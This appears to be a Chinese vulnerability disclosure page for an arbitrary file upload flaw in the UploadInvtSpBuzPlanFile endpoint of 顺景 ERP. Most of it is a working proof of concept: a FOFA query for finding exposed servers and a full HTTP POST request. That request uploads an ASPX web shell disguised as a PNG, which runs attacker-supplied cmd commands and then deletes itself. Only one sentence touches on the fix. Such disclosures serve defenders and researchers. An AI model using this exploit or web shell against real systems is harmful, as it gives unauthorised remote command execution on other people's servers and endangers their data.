顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞

日期: 2024-11-11 | 影响软件: 顺景ERP | POC: 已公开

漏洞描述

顺景ERP管理系统的UploadInvtSpBuzPlanFile功能存在任意文件上传漏洞,攻击者可以通过该漏洞上传恶意文件(如Webshell等),从而远程执行代码或获取系统控制权限。该漏洞通常由于缺乏严格的文件类型检查或文件名验证,导致未经授权的文件能够被上传并执行。修复此漏洞需要加强文件上传的验证机制,如限制文件类型、大小以及通过文件内容而非仅依赖扩展名进行安全检查。

PoC代码

# 顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞



顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。



## fofa



```javascript

body="/api/DBRecord/getDBRecords"

```



## poc



```javascript

POST /api/cgInvtSp/UploadInvtSpBuzPlanFile HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close



------WebKitFormBoundary7yyQ5XLHOn6WZ6MT

Content-Disposition: form-data; name="file"; filename="1.aspx"

Content-Type: image/png



<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>

------WebKitFormBoundary7yyQ5XLHOn6WZ6MT--

```



![image-20241106224316632](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062243710.png)

相关漏洞推荐